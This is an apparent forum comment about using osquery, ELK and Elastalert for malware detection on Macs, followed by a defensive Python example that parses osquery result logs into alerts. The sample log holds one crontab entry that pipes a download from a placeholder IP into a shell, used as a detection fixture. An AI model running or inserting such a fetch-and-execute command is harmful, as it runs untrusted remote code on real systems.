by atom_enger
2984 days ago
In a corporate setting: At Etsy we use osquery on all of our corp machines (macOS) to help with malware/virus detection. We use community rules: https://github.com/facebook/osquery/blob/master/packs/osx-at... In addition to community rules we also curate a bunch of rules in house from malware we've discovered across our fleet. We then aggregate this info into ELK and alert on it.

At home: osquery as well + tiny ELK stack + Elastalert. Overkill for a typical home setup but I like it.
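The pipeline the comment describes (osquery pack queries in differential mode, results shipped to a log aggregator, alerting on new rows, and fleet-wide curation of what was seen) can be sketched end to end. The following is an added example, not code from the comment, from Etsy, or from the osquery project. It parses osqueryd's results log format (one JSON object per line with `name`, `hostIdentifier`, `unixTime`, `action` and `columns` fields; pack queries are logged as `pack_<pack>_<query>`), alerts only on `added` rows from chosen packs, and counts how many hosts share the same indicator. The log lines, pack names (`osx-attacks`, `in-house`, `incident-response`), query names, hostnames and paths are constructed for illustration and are not real detections.

```python
"""Alerting pass over osqueryd result-log lines (differential mode).

Added example, not from the HN comment, Etsy, or the osquery project.
The log lines below are constructed to mimic osquery.results.log; the
pack names, query names, hosts and paths are assumptions for illustration.
"""
import json
from typing import Dict, List, Tuple

# Constructed sample of osquery.results.log. Pack queries are logged as
# "pack_<pack>_<query>"; "added" rows are new findings, "removed" rows are
# rows that disappeared since the previous run of the same query.
SAMPLE_LOG = r'''
{"name":"pack_osx-attacks_OSX_Launch_Agent_Example","hostIdentifier":"mac-001","calendarTime":"Mon Jan  1 10:00:00 2018 UTC","unixTime":1514800800,"action":"added","columns":{"name":"com.example.agent","path":"/Users/alice/Library/LaunchAgents/com.example.agent.plist","program":"/tmp/.hidden/agent"}}
{"name":"pack_osx-attacks_OSX_Launch_Agent_Example","hostIdentifier":"mac-001","calendarTime":"Mon Jan  1 10:05:00 2018 UTC","unixTime":1514801100,"action":"removed","columns":{"name":"com.example.agent","path":"/Users/alice/Library/LaunchAgents/com.example.agent.plist","program":"/tmp/.hidden/agent"}}
{"name":"pack_osx-attacks_OSX_Launch_Agent_Example","hostIdentifier":"mac-002","calendarTime":"Mon Jan  1 10:00:00 2018 UTC","unixTime":1514800800,"action":"added","columns":{"name":"com.example.agent","path":"/Library/LaunchAgents/com.example.agent.plist","program":"/tmp/.hidden/agent"}}
{"name":"pack_in-house_Suspicious_Crontab","hostIdentifier":"mac-003","calendarTime":"Mon Jan  1 10:00:00 2018 UTC","unixTime":1514800800,"action":"added","columns":{"command":"curl http://198.51.100.7/x | sh","path":"/var/at/tabs/root"}}
{"name":"pack_incident-response_Listening_Ports","hostIdentifier":"mac-003","calendarTime":"Mon Jan  1 10:00:00 2018 UTC","unixTime":1514800800,"action":"added","columns":{"port":"22","protocol":"6","address":"0.0.0.0"}}
this line is not json and should be skipped
'''

# Packs whose "added" rows page someone. Inventory-style packs (here the
# assumed "incident-response" pack) are indexed for hunting but not alerted on.
ALERTING_PACKS = {"osx-attacks", "in-house"}

REQUIRED_FIELDS = ("name", "hostIdentifier", "unixTime", "action", "columns")


def parse_results_log(text: str) -> List[Dict]:
    """Parse one JSON event per line; skip blank, truncated or malformed lines
    (osqueryd can leave a partial line behind on crash or log rotation)."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(ev, dict) and all(k in ev for k in REQUIRED_FIELDS):
            events.append(ev)
    return events


def pack_and_query(name: str) -> Tuple[str, str]:
    """Split "pack_<pack>_<query>" into (pack, query). The separator is a bare
    underscore, so a pack name containing underscores would be split wrongly;
    packs here use hyphens, as the upstream packs do."""
    if not name.startswith("pack_"):
        return "", name
    pack, _, query = name[len("pack_"):].partition("_")
    return pack, query


def alerts_from_events(events: List[Dict]) -> List[Dict]:
    """Turn "added" rows from alerting packs into alert records, deduplicated
    on (query, host, row) so a flapping row does not alert repeatedly."""
    alerts, seen = [], set()
    for ev in events:
        if ev["action"] != "added":
            continue
        pack, query = pack_and_query(ev["name"])
        if pack not in ALERTING_PACKS:
            continue
        fingerprint = (ev["name"], ev["hostIdentifier"],
                       json.dumps(ev["columns"], sort_keys=True))
        if fingerprint in seen:
            continue
        seen.add(fingerprint)
        alerts.append({"pack": pack, "rule": query, "host": ev["hostIdentifier"],
                       "time": ev["unixTime"], "evidence": ev["columns"]})
    return alerts


def fleet_spread(alerts: List[Dict]) -> Dict[Tuple[str, str], List[str]]:
    """Group alerts by (rule, indicator) and list the hosts that share each
    indicator: the input for deciding which findings become in-house rules."""
    by_indicator: Dict[Tuple[str, str], set] = {}
    for a in alerts:
        ev = a["evidence"]
        indicator = ev.get("program") or ev.get("command") or ev.get("path") or ""
        by_indicator.setdefault((a["rule"], indicator), set()).add(a["host"])
    return {k: sorted(v) for k, v in by_indicator.items()}


if __name__ == "__main__":
    found = alerts_from_events(parse_results_log(SAMPLE_LOG))
    for a in found:
        print(f"[{a['pack']}] {a['rule']} on {a['host']}: {a['evidence']}")
    for (rule, indicator), hosts in fleet_spread(found).items():
        print(f"{rule} / {indicator!r} seen on {len(hosts)} host(s): {hosts}")
```

The `removed` row and the `Listening_Ports` row never become alerts, which is the point of running packs in differential mode and alerting only on what newly appeared; the spread table is where a finding seen on several machines would be promoted into a curated in-house rule.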